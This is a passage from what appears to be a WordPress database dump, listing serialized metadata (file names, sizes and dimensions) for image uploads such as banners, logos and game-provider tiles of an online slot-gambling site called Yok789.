:10:\"image/webp\";s:8:\"filesize\";i:8000;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:28:\"Slot-NO1-Yok789-768x768.webp\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:61300;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1979,279,'_wp_attached_file','2026/02/Bonus-free-100_-Banner-Yok789.webp'),(1980,279,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:42:\"2026/02/Bonus-free-100_-Banner-Yok789.webp\";s:8:\"filesize\";i:101882;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:42:\"Bonus-free-100_-Banner-Yok789-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:14326;}s:5:\"large\";a:5:{s:4:\"file\";s:43:\"Bonus-free-100_-Banner-Yok789-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:75916;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:42:\"Bonus-free-100_-Banner-Yok789-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:8362;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:42:\"Bonus-free-100_-Banner-Yok789-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:53140;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1981,280,'_wp_attached_file','2026/02/Demo-play-slot-Banner-Yok789.webp'),(1982,280,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:41:\"2026/02/Demo-play-slot-Banner-Yok789.webp\";s:8:\"filesize\";i:90034;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:41:\"Demo-play-slot-Banner-Yok789-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:13882;}s:5:\"large\";a:5:{s:4:\"file\";s:42:\"Demo-play-slot-Banner-Yok789-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:68344;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:41:\"Demo-play-slot-Banner-Yok789-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7836;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:41:\"Demo-play-slot-Banner-Yok789-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:48464;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1983,281,'_wp_attached_file','2026/02/20-get-100-Banner-Yok789.webp'),(1984,281,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:37:\"2026/02/20-get-100-Banner-Yok789.webp\";s:8:\"filesize\";i:91496;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"20-get-100-Banner-Yok789-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:13130;}s:5:\"large\";a:5:{s:4:\"file\";s:38:\"20-get-100-Banner-Yok789-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:67890;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"20-get-100-Banner-Yok789-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7686;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:37:\"20-get-100-Banner-Yok789-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:48150;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1985,282,'_wp_attached_file','2026/02/79-get-200-Banner-Yok789.webp'),(1986,282,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:37:\"2026/02/79-get-200-Banner-Yok789.webp\";s:8:\"filesize\";i:86310;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"79-get-200-Banner-Yok789-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:13434;}s:5:\"large\";a:5:{s:4:\"file\";s:38:\"79-get-200-Banner-Yok789-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:64712;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"79-get-200-Banner-Yok789-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7736;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:37:\"79-get-200-Banner-Yok789-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:45964;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1987,283,'_wp_attached_file','2026/02/Yok789-loggo.webp'),(1988,283,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:256;s:4:\"file\";s:25:\"2026/02/Yok789-loggo.webp\";s:8:\"filesize\";i:31870;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"Yok789-loggo-300x75.webp\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:8508;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"Yok789-loggo-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:4256;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"Yok789-loggo-768x192.webp\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:24740;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1989,284,'_wp_attached_file','2026/02/pragmatic.webp'),(1990,284,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:651;s:6:\"height\";i:500;s:4:\"file\";s:22:\"2026/02/pragmatic.webp\";s:8:\"filesize\";i:85560;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"pragmatic-300x230.webp\";s:5:\"width\";i:300;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:27898;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"pragmatic-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:14734;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1991,285,'_wp_attached_file','2026/02/Slot-xo.webp'),(1992,285,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:314;s:6:\"height\";i:500;s:4:\"file\";s:20:\"2026/02/Slot-xo.webp\";s:8:\"filesize\";i:53322;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"Slot-xo-188x300.webp\";s:5:\"width\";i:188;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:22902;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"Slot-xo-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:11464;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1993,286,'_wp_attached_file','2026/02/Microgaming.webp'),(1994,286,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:314;s:6:\"height\";i:500;s:4:\"file\";s:24:\"2026/02/Microgaming.webp\";s:8:\"filesize\";i:29092;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"Microgaming-188x300.webp\";s:5:\"width\";i:188;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12702;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"Microgaming-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:5706;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1995,287,'_wp_attached_file','2026/02/PG.webp'),(1996,287,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:651;s:6:\"height\";i:500;s:4:\"file\";s:15:\"2026/02/PG.webp\";s:8:\"filesize\";i:123820;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:15:\"PG-300x230.webp\";s:5:\"width\";i:300;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:27600;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"PG-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:13324;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1997,288,'_wp_attached_file','2026/02/Character-2-.webp'),(1998,288,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:25:\"2026/02/Character-2-.webp\";s:8:\"filesize\";i:90878;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"Character-2--300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:13496;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"Character-2--1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:72046;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"Character-2--150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12628;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"Character-2--768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:50386;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1999,289,'_wp_attached_file','2026/02/Character-3-.webp'),(2000,289,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:25:\"2026/02/Character-3-.webp\";s:8:\"filesize\";i:175592;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"Character-3--300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:20256;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"Character-3--1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:123350;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"Character-3--150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:13958;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"Character-3--768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:82298;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2001,290,'_wp_attached_file','2026/02/icon512-Yok789.webp'),(2002,290,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:27:\"2026/02/icon512-Yok789.webp\";s:8:\"filesize\";i:29876;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"icon512-Yok789-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:16002;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"icon512-Yok789-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7100;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2003,291,'_wp_attached_file','2026/02/JILI.webp'),(2004,291,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:314;s:6:\"height\";i:500;s:4:\"file\";s:17:\"2026/02/JILI.webp\";s:8:\"filesize\";i:53430;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"JILI-188x300.webp\";s:5:\"width\";i:188;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:23842;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"JILI-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:11192;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2005,292,'_wp_attached_file','2026/02/JOKER.webp'),(2006,292,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:314;s:6:\"height\";i:500;s:4:\"file\";s:18:\"2026/02/JOKER.webp\";s:8:\"filesize\";i:46184;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"JOKER-188x300.webp\";s:5:\"width\";i:188;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:21652;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"JOKER-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:10506;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2007,293,'_wp_attached_file','2026/02/3icon-Yok789.webp'),(2008,293,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:25:\"2026/02/3icon-Yok789.webp\";s:8:\"filesize\";i:92096;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"3icon-Yok789-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:17422;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"3icon-Yok789-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:75512;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"3icon-Yok789-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9248;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"3icon-Yok789-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:54732;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2009,294,'_wp_attached_file','2026/02/Character-1-.webp'),(2010,294,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:25:\"2026/02/Character-1-.webp\";s:8:\"filesize\";i:81666;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"Character-1--300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12168;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"Character-1--1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:63172;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"Character-1--150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:10832;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"Character-1--768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:44866;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2011,283,'_wp_attachment_image_alt','YOK789'),(2012,295,'_wp_attachment_image_alt','YOK789'),(2013,295,'_wp_attached_file','2026/02/cropped-Yok789-loggo.webp'),(2014,295,'_wp_attachment_context','custom-logo'),(2015,295,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1022;s:6:\"height\";i:256;s:4:\"file\";s:33:\"2026/02/cropped-Yok789-loggo.webp\";s:8:\"filesize\";i:32772;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:32:\"cropped-Yok789-loggo-300x75.webp\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:8508;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"cropped-Yok789-loggo-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:4216;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:33:\"cropped-Yok789-loggo-768x192.webp\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:24494;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2017,290,'_wp_attachment_image_alt','Yok789'),(2018,297,'_wp_attachment_image_alt','Yok789'),(2019,297,'_wp_attached_file','2026/02/cropped-icon512-Yok789.webp'),(2020,297,'_wp_attachment_context','site-icon'),(2021,297,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:35:\"2026/02/cropped-icon512-Yok789.webp\";s:8:\"filesize\";i:29038;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:35:\"cropped-icon512-Yok789-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:15798;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:35:\"cropped-icon512-Yok789-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6998;}s:13:\"site_icon-270\";a:5:{s:4:\"file\";s:35:\"cropped-icon512-Yok789-270x270.webp\";s:5:\"width\";i:270;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:13940;}s:13:\"site_icon-192\";a:5:{s:4:\"file\";s:35:\"cropped-icon512-Yok789-192x192.webp\";s:5:\"width\";i:192;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9400;}s:13:\"site_icon-180\";a:5:{s:4:\"file\";s:35:\"cropped-icon512-Yok789-180x180.webp\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:8574;}s:12:\"site_icon-32\";a:5:{s:4:\"file\";s:33:\"cropped-icon512-Yok789-32x32.webp\";s:5:\"width\";i:32;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:1180;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2024,46,'_wp_old_date','2025-10-23'),(2025,41,'_wp_old_date','2025-10-23'),(2026,40,'_wp_old_date','2025-10-23'),(2027,39,'_wp_old_date','2025-10-23'),(2028,38,'_wp_old_date','2025-10-23'),(2042,274,'_wp_attachment_image_alt','YOK789'),(2043,273,'_wp_attachment_image_alt','YOK789'),(2044,278,'_wp_attachment_image_alt','Yok789'),(2045,294,'_wp_attachment_image_alt','yok789'),(2046,288,'_wp_attachment_image_alt','yok789'),(2047,299,'_thumbnail_id','273'),(2048,299,'_elementor_edit_mode','builder'),(2049,299,'_elementor_template_type','wp-page'),(2050,299,'_elementor_version','3.32.5'),(2051,299,'_elementor_pro_version','3.32.3'),(2052,299,'_wp_page_template','default'),(2053,2